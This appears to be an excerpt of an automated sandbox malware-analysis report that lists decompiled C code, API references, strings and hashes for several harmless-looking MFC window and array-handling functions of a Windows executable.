0x00409524
0x00409527
0x0040952c
0x0040952f
0x00409536
0x00409542
0x0040954a

APIs

__EH_prolog.LIBCMT ref: 004094F4

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42( - Instant), ref: 0040951B
#4129.MFC42(?,00000000, - Instant), ref: 00409527
#800.MFC42(?,00000000, - Instant), ref: 00409536

Strings

- Instant, xrefs: 00409513

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID: - Instant
API String ID: 2193304076-2053033291
Opcode ID: e80fda6f9fe8be1e5509d19974baf6ecb410c66ab35e247f5f3cc8735f09ebbb
Instruction ID: 345a77c6ba4fe2e0cfde7a24f2fd2743aeb669407bde5c04280b7035b9b2ab24
Opcode Fuzzy Hash: e80fda6f9fe8be1e5509d19974baf6ecb410c66ab35e247f5f3cc8735f09ebbb
Instruction Fuzzy Hash: E8F01772800118BBCB15EF51D842BDE7B64EB18768F10C01BF4266A181DBB8A708CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC97, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040AC97(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43fbaf, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(" - Conversation");
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x0040ac9c
0x0040aca2
0x0040aca7
0x0040acad
0x0040acae
0x0040acba
0x0040acbb
0x0040acc0
0x0040acc3
0x0040acc8
0x0040accc
0x0040accf
0x0040acd4
0x0040acd7
0x0040acde
0x0040acea
0x0040acf2

APIs

__EH_prolog.LIBCMT ref: 0040AC9C

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42( - Conversation), ref: 0040ACC3
#4129.MFC42(?,00000000, - Conversation), ref: 0040ACCF
#800.MFC42(?,00000000, - Conversation), ref: 0040ACDE

Strings

- Conversation, xrefs: 0040ACBB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID: - Conversation
API String ID: 2193304076-2140947825
Opcode ID: 4861a1e054ece1eca676c23cabec53f073c173a92806179148eccf01c2bee5ca
Instruction ID: d7bf907dffd7de14fc1217a2f803614d47347cdcb64739dcb1316e62961214a9
Opcode Fuzzy Hash: 4861a1e054ece1eca676c23cabec53f073c173a92806179148eccf01c2bee5ca
Instruction Fuzzy Hash: A6F01772800158BBCB15EF51D852BDEBB64EF18368F10D41FF8265A181DBB8A708CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409E3A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409E3A(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43f987, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(" - Instant");
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x00409e3f
0x00409e45
0x00409e4a
0x00409e50
0x00409e51
0x00409e5d
0x00409e5e
0x00409e63
0x00409e66
0x00409e6b
0x00409e6f
0x00409e72
0x00409e77
0x00409e7a
0x00409e81
0x00409e8d
0x00409e95

APIs

__EH_prolog.LIBCMT ref: 00409E3F

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42( - Instant), ref: 00409E66
#4129.MFC42(?,00000000, - Instant), ref: 00409E72
#800.MFC42(?,00000000, - Instant), ref: 00409E81

Strings

- Instant, xrefs: 00409E5E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID: - Instant
API String ID: 2193304076-2053033291
Opcode ID: af71bf522ecca2b15a16ea726177db2ded6eaf2883fb4ccd5bc85b399805b829
Instruction ID: fdf33ca2c1e0a3934ae376edd26070eac98eef0caaef625de194a0f2f3684972
Opcode Fuzzy Hash: af71bf522ecca2b15a16ea726177db2ded6eaf2883fb4ccd5bc85b399805b829
Instruction Fuzzy Hash: 91F01772800118BBCB15EF51D842BDE7B64EF18768F10C01BF8266A181DBB8A708CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409DB9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00409DB9(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t19;
				void* _t21;

				E0043E4E0(0x43f95b, _t21);
				_push(__ecx);
				_t19 = __ecx;
				 *((intOrPtr*)(_t21 - 0x10)) = __ecx;
				E0040FB90(__ecx);
				L0043DDD8();
				 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x4461f8;
				if(E00428A6B() == 0) {
					_push("RichEdit20A");
				} else {
					_push("RichEdit20W");
				}
				L0043DDD2();
				 *[fs:0x0] =  *((intOrPtr*)(_t21 - 0xc));
				return _t19;
			}

0x00409dbe
0x00409dc3
0x00409dc5
0x00409dc8
0x00409dcb
0x00409dd5
0x00409dda
0x00409dde
0x00409deb
0x00409df4
0x00409ded
0x00409ded
0x00409ded
0x00409dfb
0x00409e07
0x00409e0f

APIs

__EH_prolog.LIBCMT ref: 00409DBE
#540.MFC42(?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DD5

Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85

#860.MFC42(RichEdit20A,?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DFB

Strings

RichEdit20W, xrefs: 00409DED
RichEdit20A, xrefs: 00409DF4

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540#860H_prologVersion
String ID: RichEdit20A$RichEdit20W
API String ID: 1823533695-2091729579
Opcode ID: c2f21d3aa1e39505a26325de50ff34c00416b922c6b46f32a96c83de73546657
Instruction ID: 92f5c37f34fcf2750257f6e180866eaf9bd4e6f1dac2acc7f9d570b850304991
Opcode Fuzzy Hash: c2f21d3aa1e39505a26325de50ff34c00416b922c6b46f32a96c83de73546657
Instruction Fuzzy Hash: BAE0E531B0011157CB156F16841276DB2A5EF84749F00403FB412A33C2CFBC5E059699

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAB9, Relevance: 7.6, APIs: 5, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FAB9(void* __ecx, signed int _a4, signed int _a8) {
				void* __ebp;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t50;
				signed int _t53;
				signed int _t55;
				void* _t60;
				void* _t61;
				signed int _t62;
				void* _t63;
				void* _t65;
				void* _t67;
				signed int _t69;
				signed int _t76;
				void* _t77;

				_t42 = _a8;
				_t77 = __ecx;
				if(_t42 != 0xffffffff) {
					 *((intOrPtr*)(__ecx + 0x10)) = _t42;
				}
				_t76 = _a4;
				if(_t76 != 0) {
					_t65 =  *(_t77 + 4);
					__eflags = _t65;
					if(_t65 != 0) {
						_t62 =  *(_t77 + 0xc);
						__eflags = _t76 - _t62;
						if(_t76 > _t62) {
							_t43 =  *(_t77 + 0x10);
							__eflags = _t43;
							if(_t43 == 0) {
								asm("cdq");
								_t69 = 8;
								_t43 =  *(_t77 + 8) / _t69;
								__eflags = _t43 - 4;
								if(_t43 >= 4) {
									__eflags = _t43 - 0x400;
									if(_t43 > 0x400) {
										_t43 = 0x400;
									}
								} else {
									_t43 = 4;
								}
							}
							_t44 = _t43 + _t62;
							__eflags = _t76 - _t44;
							_a8 = _t44;
							if(_t76 >= _t44) {
								_a8 = _t76;
							}
							_t46 = _a8 << 3;
							_push(_t46);
							L0043DD54();
							_t63 = _t46;
							memcpy(_t63,  *(_t77 + 4),  *(_t77 + 8) << 3);
							_t50 =  *(_t77 + 8);
							_t67 = _t76 - _t50;
							__eflags = _t67;
							_push(_t67);
							_push(_t63 + _t50 * 8);
							E0041FC5A();
							_push( *(_t77 + 4));
							L0043DD42();
							_t53 = _a8;
							 *(_t77 + 4) = _t63;
							 *(_t77 + 8) = _t76;
							 *(_t77 + 0xc) = _t53;
							return _t53;
						}
						_t55 =  *(_t77 + 8);
						__eflags = _t55 - _t76;
						if(__eflags >= 0) {
							if(__eflags > 0) {
								_t55 = E0041FC06(_t65 + _t76 * 8, _t55 - _t76);
							}
						} else {
							_push(_t76 - _t55);
							_push(_t65 + _t55 * 8);
							_t55 = E0041FC5A();
						}
						L8:
						 *(_t77 + 8) = _t76;
						return _t55;
					}
					_t60 = _t76 << 3;
					__eflags = _t60;
					_push(_t60);
					L0043DD54();
					 *(_t77 + 4) = _t60;
					_push(_t76);
					_push(_t60);
					_t55 = E0041FC5A();
					 *(_t77 + 0xc) = _t76;
					goto L8;
				} else {
					_t61 =  *(_t77 + 4);
					if(_t61 != 0) {
						_t61 = E0041FC06(_t61,  *(_t77 + 8));
						_push( *(_t77 + 4));
						L0043DD42();
						 *(_t77 + 4) =  *(_t77 + 4) & _t76;
					}
					 *(_t77 + 0xc) =  *(_t77 + 0xc) & 0x00000000;
					 *(_t77 + 8) =  *(_t77 + 8) & 0x00000000;
					return _t61;
				}
			}

0x0041fabc
0x0041fac5
0x0041fac7
0x0041fac9
0x0041fac9
0x0041facc
0x0041fad1
0x0041fafc
0x0041faff
0x0041fb01
0x0041fb24
0x0041fb27
0x0041fb29
0x0041fb52
0x0041fb55
0x0041fb57
0x0041fb5e
0x0041fb5f
0x0041fb60
0x0041fb62
0x0041fb65
0x0041fb71
0x0041fb73
0x0041fb75
0x0041fb75
0x0041fb67
0x0041fb69
0x0041fb69
0x0041fb65
0x0041fb77
0x0041fb79
0x0041fb7b
0x0041fb7e
0x0041fb80
0x0041fb80
0x0041fb86
0x0041fb89
0x0041fb8a
0x0041fb8f
0x0041fb9c
0x0041fba1
0x0041fba9
0x0041fba9
0x0041fbae
0x0041fbaf
0x0041fbb0
0x0041fbb5
0x0041fbb8
0x0041fbbd
0x0041fbc1
0x0041fbc4
0x0041fbc7
0x00000000
0x0041fbc7
0x0041fb2b
0x0041fb2e
0x0041fb30
0x0041fb42
0x0041fb4b
0x0041fb4b
0x0041fb32
0x0041fb39
0x0041fb3a
0x0041fb3b
0x0041fb3b
0x0041fb1c
0x0041fb1c
0x00000000
0x0041fb1c
0x0041fb05
0x0041fb05
0x0041fb08
0x0041fb09
0x0041fb0f
0x0041fb12
0x0041fb13
0x0041fb14
0x0041fb19
0x00000000
0x0041fad3
0x0041fad3
0x0041fad8
0x0041fade
0x0041fae3
0x0041fae6
0x0041faeb
0x0041faee
0x0041faef
0x0041faf3
0x00000000
0x0041faf3

APIs

#825.MFC42(?,?,?), ref: 0041FAE6
#823.MFC42(?), ref: 0041FB8A
memcpy.MSVCRT ref: 0041FB9C
#823.MFC42(?), ref: 0041FB09

Part of subcall function 0041FC5A: __EH_prolog.LIBCMT ref: 0041FC5F
Part of subcall function 0041FC5A: memset.MSVCRT ref: 0041FC75
Part of subcall function 0041FC5A: #540.MFC42(0041FBB5,?,?), ref: 0041FC92

#825.MFC42(?,?,?), ref: 0041FBB8

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823#825$#540H_prologmemcpymemset
String ID:
API String ID: 533099814-0
Opcode ID: 4f4df3a7d39aaf4a0e7c088ac89d8b098dd69874d2e3c79ccb9fff79af8d6882
Instruction ID: a8f0049f047b1e3c1c3078f953027271bd66462d13f02b3e30c9c7d7052a7944
Opcode Fuzzy Hash: 4f4df3a7d39aaf4a0e7c088ac89d8b098dd69874d2e3c79ccb9fff79af8d6882
Instruction Fuzzy Hash: 2431D771704B049BD720DE6AD8519A7B3E9EF84314B10C93FF46AC7651D738F88A8B18

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD83, Relevance: 7.6, APIs: 5, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042AD83(void* __ecx, signed int _a4, signed int _a8) {
				signed int _t34;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int _t46;
				signed int _t48;
				signed int _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t55;
				signed int _t61;
				signed int _t68;
				void* _t69;

				_t34 = _a8;
				_t69 = __ecx;
				if(_t34 != 0xffffffff) {
					 *((intOrPtr*)(__ecx + 0x10)) = _t34;
				}
				_t68 = _a4;
				if(_t68 != 0) {
					_t11 = _t69 + 4; // 0x42ad67
					_t57 =  *_t11;
					if( *_t11 != 0) {
						_t15 = _t69 + 0xc; // 0x410b70
						_t54 =  *_t15;
						if(_t68 > _t54) {
							_t17 = _t69 + 0x10; // 0x403f4d
							_t35 =  *_t17;
							if(_t35 == 0) {
								_t18 = _t69 + 8; // 0x42ad28
								asm("cdq");
								_t61 = 8;
								_t35 =  *_t18 / _t61;
								if(_t35 >= 4) {
									if(_t35 > 0x400) {
										_t35 = 0x400;
									}
								} else {
									_t35 = 4;
								}
							}
							_t36 = _t35 + _t54;
							_a8 = _t36;
							if(_t68 >= _t36) {
								_a8 = _t68;
							}
							_t38 = _a8 * 0x1004;
							_push(_t38);
							L0043DD54();
							_t55 = _t38;
							_t26 = _t69 + 8; // 0x42ad28
							_t27 = _t69 + 4; // 0x42ad67
							memcpy(_t55,  *_t27,  *_t26 * 0x1004);
							_t28 = _t69 + 8; // 0x42ad28
							E0042AF12(_t55 +  *_t28 * 0x1004, _t68 -  *_t28);
							_t29 = _t69 + 4; // 0x42ad67
							_push( *_t29);
							L0043DD42();
							_t46 = _a8;
							 *(_t69 + 4) = _t55;
							 *(_t69 + 8) = _t68;
							 *(_t69 + 0xc) = _t46;
							return _t46;
						}
						_t16 = _t69 + 8; // 0x42ad28
						_t48 =  *_t16;
						if(_t68 > _t48) {
							_t48 = E0042AF12(_t48 * 0x1004 + _t57, _t68 - _t48);
						}
						L8:
						 *(_t69 + 8) = _t68;
						return _t48;
					}
					_t52 = _t68 * 0x1004;
					_push(_t52);
					L0043DD54();
					 *(_t69 + 4) = _t52;
					_t48 = E0042AF12(_t52, _t68);
					 *(_t69 + 0xc) = _t68;
					goto L8;
				}
				_t4 = _t69 + 4; // 0x42ad67
				_t53 =  *_t4;
				if(_t53 != 0) {
					_push(_t53);
					L0043DD42();
					 *(_t69 + 4) =  *(_t69 + 4) & _t68;
				}
				 *(_t69 + 0xc) =  *(_t69 + 0xc) & 0x00000000;
				 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
				return _t53;
			}

0x0042ad86
0x0042ad8f
0x0042ad91
0x0042ad93
0x0042ad93
0x0042ad96
0x0042ad9b
0x0042adbb
0x0042adbb
0x0042adc0
0x0042ade6
0x0042ade6
0x0042adeb
0x0042ae09
0x0042ae09
0x0042ae0e
0x0042ae10
0x0042ae15
0x0042ae16
0x0042ae17
0x0042ae1c
0x0042ae2a
0x0042ae2c
0x0042ae2c
0x0042ae1e
0x0042ae20
0x0042ae20
0x0042ae1c
0x0042ae2e
0x0042ae32
0x0042ae35
0x0042ae37
0x0042ae37
0x0042ae3d
0x0042ae43
0x0042ae44
0x0042ae49
0x0042ae4b
0x0042ae55
0x0042ae59
0x0042ae5e
0x0042ae72
0x0042ae77
0x0042ae77
0x0042ae7a
0x0042ae7f
0x0042ae83
0x0042ae86
0x0042ae89
0x00000000
0x0042ae89
0x0042aded
0x0042aded
0x0042adf2
0x0042ae02
0x0042ae02
0x0042adde
0x0042adde
0x00000000
0x0042adde
0x0042adc4
0x0042adca
0x0042adcb
0x0042add1
0x0042add6
0x0042addb
0x00000000
0x0042addb
0x0042ad9d
0x0042ad9d
0x0042ada2
0x0042ada4
0x0042ada5
0x0042adaa
0x0042adad
0x0042adae
0x0042adb2
0x00000000

APIs

#825.MFC42(0042AD67,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042ADA5
#823.MFC42(000000FF,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042AE44
memcpy.MSVCRT ref: 0042AE59
#823.MFC42(74B06940,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042ADCB

Part of subcall function 0042AF12: memset.MSVCRT ref: 0042AF23

#825.MFC42(0042AD67,0042AD28,74B06940,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000,0042A4E3), ref: 0042AE7A

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823#825$memcpymemset
String ID:
API String ID: 3809198941-0
Opcode ID: f5d7f8940416119dd906d344f29c921912bd4975446fb78e45879e69d48c5bb8
Instruction ID: ca9e758b798a788e7ebd8d42da0894d482a92dffecf0b8ba358e2135409f85e2
Opcode Fuzzy Hash: f5d7f8940416119dd906d344f29c921912bd4975446fb78e45879e69d48c5bb8
